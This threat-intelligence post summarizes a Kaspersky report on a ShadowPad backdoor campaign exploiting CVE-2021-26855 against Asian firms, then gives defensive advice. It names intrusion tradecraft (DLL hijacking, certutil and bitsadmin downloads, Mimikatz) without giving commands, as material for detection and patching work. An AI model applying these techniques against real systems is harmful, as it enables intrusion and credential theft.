Threat Watch

Organizations in Asia Targeted with ShadowPad Backdoor

On Monday, Kaspersky’s ICS CERT researchers issued a report on Advanced Persistent Threat (APT) activity attacking organizations in Afghanistan, Pakistan, and Malaysia. The initial wave of compromises began in March of 2021 and was discovered by the researchers in October of 2021. The companies affected include manufacturing, telecommunications, and logistics and transport industries, and are likely part of an information gathering mission.

Researchers positively identified CVE-2021-26855, a critical Microsoft Exchange Remote Code Execution (RCE) vulnerability published in early March of 2021, as an initial attack vector for some of the companies impacted. From there, the APT downloaded the ShadowPad backdoor disguised as a valid Dynamic-Link Library (DLL) that was then launched via a valid process. In October, the attackers’ Tactics, Techniques, and Procedures (TTPs) altered, and they began leveraging DLL hijacking to maintain the backdoor. In both instances, the Windows Task Scheduler was used as a launching mechanism.

The Kaspersky researchers report that the attackers performed several manual commands before later automating the process. Other tools were also deployed onto the infected systems, such as CobaltStrike, Mimikatz, and a version of the PlugX backdoor. Due to the nature of the TTPs presented and some of the artifacts they uncovered, the research team attributes the attack to an unnamed Chinese APT.


Due to the timing of the initial compromise and the vulnerability that was exploited, it is reasonable to assume that the attack happened after Microsoft announced the vulnerability and provided a fix; while CVE-2021-26855 had been previously exploited elsewhere, it is likely this specific string of attacks happened after the official patch existed. This highlights the importance of installing security updates covering high-severity vulnerabilities as soon as possible, especially for public-facing servers. Companies should develop and maintain an emergency change management policy that enables rapid testing and delivery of security updates that fix critical vulnerabilities, especially for public-facing servers and vulnerabilities that are actively being exploited.


The backdoor itself used effective evasion techniques to avoid detection by masquerading as a legitimate process loading a legitimate DLL. However, the commands the attackers ran after infiltration are easier to detect, and are non-standard for most environments. Companies should implement command line logging and develop alerts for command line misuse of programs such as net and reg. Further, companies should establish a baseline of expected scheduled tasks, and alert on the creation of new scheduled tasks to detect potential evasion and persistence techniques.


Lastly, the tools that the attackers downloaded and installed could be detected in a number of ways. CobaltStrike, for example, was downloaded via certutil.exe. The PlugX backdoor was downloaded using bitsadmin. By establishing a baseline of normal use, companies can develop alerts for misuse of these two utilities to download malicious payloads. Additionally, companies can use tools like Zeek and Strelka to strip files from downloads and scan the files to detect malicious payloads; these can be tuned to specify the type of file, so .exe and .dat files can be included.